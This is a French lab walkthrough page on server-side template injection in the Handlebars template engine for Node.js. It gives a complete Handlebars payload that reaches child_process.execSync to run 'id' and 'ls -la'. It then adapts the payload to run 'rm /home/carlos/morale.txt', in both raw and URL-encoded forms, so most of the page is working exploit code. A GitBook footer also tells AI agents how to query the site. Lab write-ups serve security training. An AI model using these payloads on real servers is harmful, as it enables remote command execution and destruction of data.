# SSTI dans une langue inconnue avec un exploit Node.js documenté

### Injection de template côté serveur dans un langage inconnu avec un exploit documenté

Lors des tests de l'application, l'injection suivante :

```javascript
?message={{7*7}}
```

L'exemple suivant permet d'exécuter `id`:

```javascript
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('id');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
```

Ce payload doit être **encodé en URL** avant l'envoi.

```javascript
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.push%20%28lookup%20string.sub%20%22constructor%22%29%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%7B%7B%23with%20string.split%20as%20%7Ccodelist%7C%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.push%20%22return%20require%28%27child_process%27%29.execSync%28%27ls%20-la%27%29%3B%22%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string.sub.apply%200%20codelist%29%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%7B%7B%2Fwith%7D%7D%0A%7B%7B%2Fwith%7D%7D
#### Supprimer le fichier moral.txt
Pour résoudre le labo, il suffit d'adapter la commande exécutée :
```javascript
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('rm /home/carlos/morale.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
```
Ce payload encodé en URL permet de supprimer moral.txt du moteur Handlebars vulnérable.
```javascript
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.push%20%28lookup%20string.sub%20%22constructor%22%29%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%7B%7B%23with%20string.split%20as%20%7Ccodelist%7C%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.push%20%22return%20require%28%27child_process%27%29.execSync%28%27rm%20%2Fhome%2Fcarlos%2Fmorale.txt%27%29%3B%22%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis.pop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string.sub.apply%200%20codelist%29%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%7B%7B%2Fwith%7D%7D%0A%7B%7B%2Fwith%7D%7D

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/ssti/ssti-in-an-unknown-language-with-a-documented-node-js-exploit.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
